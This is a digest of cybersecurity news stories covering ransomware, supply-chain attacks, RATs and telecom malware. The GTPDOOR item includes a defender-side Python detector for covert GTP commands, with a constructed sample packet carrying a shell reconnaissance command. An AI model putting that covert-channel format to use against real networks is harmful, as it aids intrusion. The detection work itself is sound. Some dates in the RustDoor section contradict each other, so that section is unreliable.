The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, it is imperative for organisations to prioritise cybersecurity measures and stay cautious against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


Exploitation of Windows SmartScreen Bypass Flaw Facilitates Deployment of DarkGate RAT



The operators behind the DarkGate malware have been taking advantage of a recently patched flaw in Windows SmartScreen through a phishing scheme. This campaign involves circulating counterfeit Microsoft software installers to spread the malicious code.

Researchers from Trend Micro, along with others, uncovered a vulnerability earlier this year, known as CVE-2024-21412, which allowed attackers to bypass security measures in Internet Shortcut Files. Microsoft addressed this issue in its February Patch Tuesday updates, but not before threat actors like Water Hydra and DarkGate seized the opportunity to exploit it. Trend Micro's Zero Day Initiative (ZDI) reported that DarkGate also utilized this flaw in a mid-January attack, enticing users with PDFs containing Google DoubleClick Digital Marketing (DDM) redirects, ultimately leading to compromised websites hosting the malware-laden installers.

According to Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun, the attackers manipulated Google-related domains using open redirects in conjunction with CVE-2024-21412 to circumvent Microsoft Defender SmartScreen protections, facilitating malware infections. They emphasized the effectiveness of combining fake software installers with open redirects in propagating infections.

DarkGate, described as a remote-access Trojan (RAT), has been advertised on Russian-language cybercrime forums since at least 2018 and is considered one of the most sophisticated and active malware strains. It offers various functionalities, including process injection, information theft, shell command execution, and keylogging, while employing multiple evasion techniques.

The DarkGate campaign observed by Trend Micro leverages Google Open Redirects, exploiting a previously patched SmartScreen vulnerability, CVE-2023-36025, affecting all supported Windows versions. By utilizing open redirects in Google DDM technologies, threat actors can execute malicious code when combined with security bypasses.

To defend against DarkGate's exploitation of CVE-2024-21412, Windows system administrators are advised to apply Microsoft's patch promptly. Additionally, organizations should prioritize employee training to raise awareness about the risks of installing software from untrusted sources. Continuous monitoring of the cyber environment, including identifying vulnerabilities and potential attack vectors, is crucial for effective cybersecurity defense.

In conclusion, proactive measures are necessary for both businesses and individuals to safeguard their systems against evolving threats like DarkGate and similar malware campaigns.

Japan Blames Lazarus for PyPi Supply Chain Attack


Japanese cybersecurity officials issued a warning that North Korea's infamous Lazarus Group hacking group recently launched a supply chain attack on the PyPI software repository for Python apps. 

Threat actors disseminated contaminated packages with names like "pycryptoenv" and "pycryptoconf" that are comparable to the real "pycrypto" encryption tools for Python. Developers who are duped into installing the malicious packages onto their Windows workstations are infected with a severe Trojan called "Comebacker."

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded."

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to analyst and senior director at Gartner Dale Gardner. 

The trojan has been used in multiple attacks linked to North Korea, including one against an npm software development repository.

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors."

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should use extra caution and care while downloading open source dependencies. Given the amount of open source used today and the pressures of fast-paced development environments, it's easy for even a well-trained and vigilant developer to make a mistake, Gardner added. 

Gardner recommends using software composition analysis (SCA) tools to evaluate dependencies and detect fakes or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages using package managers to minimise risk.

Linux Malware GTPDOOR Exploits GPRS Roaming Networks to Target Telecom Companies


Security analysts have uncovered a fresh Linux malware named GTPDOOR, intended for deployment within telecom networks adjacent to GPRS roaming exchanges (GRX). What distinguishes this malware is its utilization of the GPRS Tunnelling Protocol (GTP) for commanding and controlling operations.

GPRS roaming enables subscribers to access their services even outside their home mobile network's coverage area. This is achieved through a GRX, which routes roaming traffic via GTP between the visited and home Public Land Mobile Networks (PLMN).

Security expert haxrob, who stumbled upon two GTPDOOR artifacts uploaded to VirusTotal originating from China and Italy, suggests that this backdoor is likely linked to a known threat actor identified as LightBasin (also known as UNC1945). 

CrowdStrike previously disclosed this actor in October 2021 for a series of attacks targeting the telecom sector to pilfer subscriber data and call metadata.

Upon execution, GTPDOOR initially alters its process name to '[syslog]', mimicking syslog invoked from the kernel, and opens a raw socket to enable the implant to receive UDP messages through the network interfaces.

Essentially, GTPDOOR enables a threat actor with established persistence on the roaming exchange network to communicate with a compromised host by dispatching GTP-C Echo Request messages carrying a malicious payload.

These GTP-C Echo Request messages serve as a conduit for transmitting commands to execute on the infected system and relaying results back to the remote host. Furthermore, GTPDOOR can be discreetly probed from an external network by sending a TCP packet to any port number. If the implant is active, it returns a crafted empty TCP packet along with information on whether the destination port was open or responsive on the host.

According to the researcher, GTPDOOR appears tailored to reside on compromised hosts directly linked to the GRX network, which are the systems communicating with other telecommunication operator networks via GRX.
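As an added defender-side example (not code from haxrob's write-up or from the GTPDOOR samples), the following Python parses GTPv1-C datagrams and flags Echo Requests whose body carries anything beyond the optional header fields or a single Private Extension IE, which is the only content a legitimate Echo Request should have. The sample datagrams are constructed, and the 0.8 printable-byte ratio is an assumed heuristic.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# GTPv1-C path-management message types (3GPP TS 29.060)
GTP_ECHO_REQUEST = 1
GTP_ECHO_RESPONSE = 2
IE_PRIVATE_EXTENSION = 0xFF   # the only IE an Echo Request may legitimately carry
PRINTABLE_RATIO = 0.8         # assumed heuristic for "looks like a command string"


@dataclass
class GtpMessage:
    msg_type: int
    length: int         # value of the header Length field
    teid: int
    seq: Optional[int]  # sequence number when the S/E/PN optional header is present
    body: bytes         # bytes after the mandatory and optional header fields


def parse_gtpv1(datagram: bytes) -> GtpMessage:
    """Parse one GTPv1 datagram (UDP payload) into header fields and body."""
    if len(datagram) < 8:
        raise ValueError("datagram shorter than the 8-byte GTPv1 header")
    flags, msg_type, length, teid = struct.unpack("!BBHI", datagram[:8])
    if flags >> 5 != 1:
        raise ValueError(f"not GTPv1 (version bits = {flags >> 5})")
    if len(datagram) != 8 + length:
        raise ValueError("Length field does not match datagram size")
    body = datagram[8:]
    seq = None
    # If any of the E, S or PN flags is set, a 4-byte optional header follows:
    # sequence number (2), N-PDU number (1), next extension header type (1).
    if flags & 0x07:
        if len(body) < 4:
            raise ValueError("truncated optional header")
        seq = struct.unpack("!H", body[:2])[0]
        body = body[4:]
    return GtpMessage(msg_type, length, teid, seq, body)


def is_single_private_extension(body: bytes) -> bool:
    """True if body is exactly one well-formed Private Extension IE (TLV, type 0xFF)."""
    if len(body) < 3 or body[0] != IE_PRIVATE_EXTENSION:
        return False
    ie_len = struct.unpack("!H", body[1:3])[0]
    return len(body) == 3 + ie_len


def echo_request_findings(msg: GtpMessage) -> list:
    """Reasons an Echo Request looks like a covert command channel (empty if none)."""
    findings = []
    if msg.msg_type != GTP_ECHO_REQUEST:
        return findings                       # only Echo Requests are of interest
    if msg.body and not is_single_private_extension(msg.body):
        findings.append(f"{len(msg.body)} body bytes beyond the Echo Request header")
        printable = sum(32 <= b < 127 for b in msg.body)
        if printable >= PRINTABLE_RATIO * len(msg.body):
            findings.append("body is mostly printable text (possible command string)")
    return findings


def scan_gtp_c_datagrams(datagrams) -> list:
    """Return (index, findings) for every malformed or suspicious datagram."""
    flagged = []
    for i, dg in enumerate(datagrams):
        try:
            msg = parse_gtpv1(dg)
        except ValueError as exc:
            flagged.append((i, [f"malformed: {exc}"]))
            continue
        findings = echo_request_findings(msg)
        if findings:
            flagged.append((i, findings))
    return flagged


def build_echo_request(body: bytes, seq: int = 1) -> bytes:
    """Construct a GTPv1 Echo Request (flags 0x32: version 1, PT=1, S set) for testing."""
    opt = struct.pack("!HBB", seq, 0, 0)
    header = struct.pack("!BBHI", 0x32, GTP_ECHO_REQUEST, len(opt) + len(body), 0)
    return header + opt + body


# Constructed sample traffic (not real captures).
SAMPLES = [
    build_echo_request(b""),                                      # benign Echo Request
    bytes.fromhex("32020004" "00000000" "0001" "00" "00"),        # benign Echo Response
    build_echo_request(b"uname -a; id\x00"),                      # constructed covert command
    build_echo_request(bytes([0xFF, 0x00, 0x03, 0x00, 0x0A, 0x42])),  # one Private Extension IE
]

if __name__ == "__main__":
    for index, reasons in scan_gtp_c_datagrams(SAMPLES):
        print(f"datagram {index}: {'; '.join(reasons)}")
```

Fed from a capture of UDP/2123 traffic at the GRX border, the same scan surfaces Echo Requests that carry more than keep-alive content.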

This Chinese PC Manufacturer Tailored its Own Devices to be Susceptible to Malware


Acemagic, a Chinese manufacturer of personal computers, has acknowledged that certain products were shipped with pre-installed malware.

The discovery was made by a YouTuber known as The Net Guy, who encountered malware on Acemagic mini PCs during testing in early February. The malware, identified as Bladabindi, was detected by Windows Defender shortly after booting the machine. Bladabindi is a well-known backdoor that can steal user information and facilitate the installation of other malicious software.

Recently, Acemagic confirmed that some of its PCs were indeed infected with Bladabindi and also raised concerns about the potential presence of another malware called Redline. Redline is capable of stealing information from web browsers, conducting system inventories, and even pilfering cryptocurrency.

Acemagic's explanation for the malware's presence was somewhat perplexing and inconsistent. Initially, the company attributed the issue to adjustments made by software developers to enhance user experience by reducing boot time, which inadvertently affected network settings and omitted digital signatures. However, in a subsequent statement to The Register, the company mentioned that the incident stemmed from similar software adjustments made by developers.

The company has pledged to bolster its use of digital certificates to prevent unauthorized modifications, hinting that external parties might have accessed its machines or its master copy of Windows to deliver the malware.

It remains uncertain whether the infections occurred at the factory or after the PCs were in the possession of their new owners. Acemagic has announced plans to refund the cost of machines manufactured between September and November 2023 and has advised owners to check the stickers affixed to their models for the date of manufacture.

Interestingly, just before The Register received Acemagic's acknowledgment of the malware issue, they received a review unit of one of its PCs. However, the labels on that unit did not contain information about the date of manufacture, nor did the QR codes provide such details.

Acemagic has provided clean system images for owners to disinfect their machines and is offering a 25 percent purchase price rebate for those who do so. Additionally, owners of infected machines can apply for a voucher providing a ten percent discount on any future Acemagic purchase, though it remains to be seen if customers will trust the brand after this incident.

How To Combat Cyber Threats In The Era Of AI





In a world dominated by technology, the role of artificial intelligence (AI) in shaping the future of cybersecurity cannot be overstated. AI, a technology capable of learning, adapting, and predicting, has become a crucial player in defending against cyber threats faced by businesses and governments.

The Initial Stage 

At the turn of the millennium, cyber threats aimed at creating chaos and notoriety were rampant. Organisations relied on basic security measures, including antivirus software and firewalls. During this time, AI emerged as a valuable tool, demonstrating its ability to identify and quarantine suspicious messages in the face of surging spam emails.

A Turning Point (2010–2020)

The structure shifted with the rise of SaaS applications, cloud computing, and BYOD policies, expanding the attack surface for cyber threats. Notable incidents like the Stuxnet worm and high-profile breaches at Target and Sony Pictures highlighted the need for advanced defences. AI became indispensable during this phase, with innovations like Cylance integrating machine-learning models to enhance defence mechanisms against complex attacks.

The Current Reality (2020–Present)

In today's world, how we work has evolved, leading to a hyperconnected IT environment. The attack surface has expanded further, challenging traditional security perimeters. Notably, AI has transitioned from being solely a defensive tool to being wielded by adversaries and defenders. This dual nature of AI introduces new challenges in the cybersecurity realm.

New Threats 

As AI evolves, new threats emerge, showcasing the innovation of threat actors. AI-generated phishing campaigns, AI-assisted target identification, and AI-driven behaviour analysis are becoming prevalent. Attackers now leverage machine learning to efficiently identify high-value targets, and AI-powered malware can mimic normal user behaviours to evade detection.

The Dual Role of AI

The evolving narrative in cybersecurity paints AI as both a shield and a spear. While it empowers defenders to anticipate and counter sophisticated threats, it also introduces complexities. Defenders must adapt to AI's dual nature, embracing innovation to master the intricacies of modern cybersecurity.

What's the Future Like?

As cybersecurity continues to evolve alongside how we leverage technology, organisations must remain vigilant. The promise lies in generative AI becoming a powerful tool for defenders, offering a new perspective to counter the threats of tomorrow. Adapting to the changing landscape of AI-driven cybersecurity is essential to remain ahead in the field.

The intersection of AI and cybersecurity is reshaping how we protect our digital assets. From the early days of combating spam to the current era of dual-use AI, the journey has been transformative. As we journey through the future, the promise of AI as a powerful ally in the fight against cyber threats offers hope for a more secure digital culture. 


Cactus Ransomware Strikes Schneider Electric, Demands Ransom



In a recent cyber attack, the Cactus ransomware group claims to have infiltrated Schneider Electric's Sustainability Business division, stealing a substantial 1.5 terabytes of data. The breach, which occurred on January 17th, has raised concerns as the gang now threatens to expose the stolen information if a ransom is not paid.

The ransomware group has already leaked 25MB of allegedly pilfered data on its dark web leak site, showcasing American citizens' passports and scans of non-disclosure agreement documents. Schneider Electric, a French multinational specialising in energy management and automation, is being coerced by the hackers to meet their ransom demand to prevent further leaks.

While the specific nature of the stolen data remains unknown, Schneider Electric's Sustainability Business division provides services related to renewable energy and regulatory compliance for major global companies such as Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. This implies that the compromised data might include sensitive information about customers' industrial control and automation systems and details regarding environmental and energy regulations compliance.

Cactus ransomware, a relatively new player in the cybercrime landscape, emerged in March 2023, employing double-extortion attacks. The group gains access to corporate networks through various means, including purchased credentials, partnerships with malware distributors, phishing attacks, or exploiting security vulnerabilities.

Once inside a target's network, the hackers navigate through the compromised system, stealing sensitive data to use as leverage in ransom negotiations. Since its inception, Cactus ransomware has targeted over 100 companies, leaking data online or threatening to do so while still engaging in ransom negotiations.

This incident is not the first time Schneider Electric has fallen victim to cyber threats. In the past, the company experienced data theft attacks orchestrated by the Clop ransomware, impacting over 2,700 other organisations. Schneider Electric, with a workforce exceeding 150,000 people globally, reported a substantial $28.5 billion in revenue in 2023.

Both companies and individuals need to stay alert to potential threats. Cybersecurity experts stress the significance of adopting strong security practices, regularly updating computer programs, and ensuring employees are well informed about potential risks. These measures are crucial for minimising the potential fallout from ransomware attacks, underlining the need for a proactive approach to safeguarding digital assets.

The Cactus ransomware attack on Schneider Electric is a stark reminder of the increasing sophistication and frequency of cyber threats in today's digital age. Businesses and individuals must prioritise cybersecurity to safeguard sensitive information and prevent financial and reputational damage.


Beware, iPhone Users: iOS GoldDigger Trojan can Steal Face ID and Banking Details


Numerous people pick iPhones over Android phones because they believe iPhones are more secure. However, this may no longer be the case due to the emergence of a new banking trojan designed explicitly to target iPhone users.

According to a detailed report by the cybersecurity firm Group-IB, the Android trojan GoldDigger has now been successfully repurposed to target iPhone and iPad users. The company claims that this is the first malware designed for iOS, posing a huge threat by collecting facial recognition data, ID documents, and even SMS. 

The malware, discovered for the first time last October, now has a new version dubbed GoldPickaxe that is optimised for iOS and Android devices. When installed on an iPhone or Android phone, GoldPickaxe can collect facial recognition data, ID documents, and intercepted text messages, all with the goal of making it easier to withdraw funds from banks and other financial apps. To make matters worse, this biometric data is utilised to create AI deepfakes, which allow attackers to mimic victims and gain access to their bank accounts. 

It is vital to note that the GoldPickaxe malware is now targeting victims in Vietnam and Thailand. However, as with other malware schemes, if this one succeeds, the cybercriminals behind it may expand their reach to target iPhone and Android users in the United States, Europe, and the rest of the world. 

Android banking trojans are typically propagated via malicious apps and phishing campaigns. It is more difficult to install a trojan on an iPhone since Apple's ecosystem is more locked off than Google's. However, as hackers often do, they've figured out a way.

Initially, the malware was disseminated via Apple's TestFlight program, which allows developers to deploy beta app versions without going through the App Store's authorization process. However, after Apple removed it from TestFlight, the hackers shifted to a more complicated way employing a Mobile Device Management (MDM) profile, which is generally used to manage enterprise devices. 

Given how successful a banking trojan like GoldDigger or GoldPickaxe can be, especially since it can target both iPhones and Android phones, this is unlikely to be the last time we hear about this spyware or the hackers behind it. As of now, even the latest versions of iOS and iPadOS appear to be vulnerable to this Trojan. Group-IB has contacted Apple about the flaw, so a solution is likely in the works.

FBI Shuts Down Warzone RAT; Cybercriminals Arrested



In a major victory against cybercrime, the FBI has successfully taken down the Warzone RAT malware operation. This operation led to the arrest of two individuals involved in the illicit activities. One of the suspects, 27-year-old Daniel Meli from Malta, was apprehended for his role in the distribution of Warzone RAT, a notorious remote access trojan used for various cybercrimes.

Warzone RAT, also known as 'AveMaria,' surfaced in 2018 as a commodity malware offering a range of malicious features. These include bypassing User Account Control (UAC), stealing passwords and cookies, keylogging, remote desktop access, webcam recording, and more. Meli's arrest took place last week in Malta following an indictment issued by U.S. law enforcement authorities on December 12, 2023.

The charges against Meli include unauthorised damage to protected computers, illegally selling and advertising an electronic interception device, and participating in a conspiracy to commit several computer intrusion offences. He has been involved in the cybercrime space since at least 2012, starting at the age of 15 by selling hacking ebooks and the Pegasus RAT for a criminal group called 'Skynet-Corporation.'

Simultaneously, another key figure linked to Warzone RAT, Prince Onyeoziri Odinakachi, 31, from Nigeria, was arrested for providing customer support to cybercriminals purchasing access to the malware. Federal authorities in Boston seized four domains, including the primary website "warzone.ws," associated with Warzone RAT.

The international law enforcement effort coordinated by the FBI not only resulted in arrests but also identified and confiscated server infrastructure related to the malware across various countries, including Canada, Croatia, Finland, Germany, the Netherlands, and Romania.

While the U.S. Department of Justice (DoJ) mainly implicates Meli in the distribution and customer support for the malware, it remains unclear whether he is the original creator of Warzone RAT. The DoJ announcement reveals Meli's involvement as a seller in the cybercrime space since the age of 15, raising questions about the malware's origin.

Meli faces serious consequences, with a potential 15-year prison sentence, three years of supervised release, and fines of up to $500,000 or twice the gross gain or loss (whichever is greater) for the charges against him. The Northern District of Georgia seeks Meli's extradition from Malta to the United States for trial.

This successful operation not only brings two significant cybercriminals to justice but also marks a crucial step in dismantling the infrastructure supporting Warzone RAT. The FBI's coordinated efforts with international law enforcement agencies highlight the commitment to combating cyber threats on a global scale. The implications of this takedown will likely have a positive impact on cybersecurity efforts worldwide, deterring future malicious activities.


Malware Masked as a Visual Studio Update Poses a Threat to macOS



During the last few months, a significant and alarming development in the cybersecurity field has been the discovery of a new malware strain known as RustDoor that has specifically been designed for macOS users. It is RustDoor's sophisticated and deceptive tactics that set it apart from its counterparts—it masquerades as an update to Visual Studio, a highly regarded integrated development environment. 

This method of infiltration is especially insidious because it relies on the implicit trust users place in routine software updates, leading them to download and install malware on their macOS machines unwittingly. By posing as a legitimate software update, RustDoor exploits the trust users already have in well-known and reliable software.

The malware takes advantage of users who routinely install updates to their software tools to keep them secure and working at their best. To do so, RustDoor imitates Visual Studio, one of the staple platforms in software development.

According to Bitdefender, the campaign that rolled out the backdoor began in November 2023 and is still going on, distributing new versions of the backdoor. Research by Bitdefender indicates that Trojan.MAC.RustDoor is likely connected to the BlackCat/ALPHV malware. The newly discovered backdoor, written in Rust, pretends to be an update to the Visual Studio code editor.

Several variants of the malware have been identified by Bitdefender, all of which have the same backdoor functionality, even if they differ slightly. All analyzed samples can harvest and exfiltrate files and gather information about infected machines using multiple commands. The information is sent to a command-and-control server to generate a victim ID that is used in subsequent communications.

It is likely that the first version of the backdoor, which appeared on November 20, 2023, was merely a test version with no complete persistence mechanism, although it did contain a list file named "test" and other documents. Further variants of the malware, first observed at the end of November, had larger files and contained complex JSON configurations as well as Apple scripts used to exfiltrate certain documents, as well as a user's notes, from the Documents and Desktop folders.

The malware copies the documents into a hidden folder, compresses them into a ZIP archive and sends the archive to the command and control server. Bitdefender also found that RustDoor's configuration file contains options that can be used to impersonate different applications, as well as to customize a spoofed administrator password dialogue box.

Bitdefender reports that it has discovered three variants of RustDoor, the earliest one seen since the beginning of October 2023. An updated version observed on November 30 was found to contain an embedded Apple script used to exfiltrate files with specific extensions listed in the JSON configuration; this version was likely a testing version that preceded an updated version observed on November 22.

This report provides a list of known indicators of RustDoor compromise, which includes binary files and download domains, as well as the URLs and commands for each of the four C&C servers that were discovered by the researchers. This ruse allows RustDoor to gain unauthorized access to a user's system once they install what appears to be a genuine update for Visual Studio.

The user then has increased exposure to a wide array of malicious activity. Considering that Visual Studio is widely used by professionals, developers, and even individuals, it is safe to say that the effects of RustDoor go beyond individual users. There is a serious risk of large-scale attacks using this malware that could have profound consequences, underlining the critical importance of monitoring.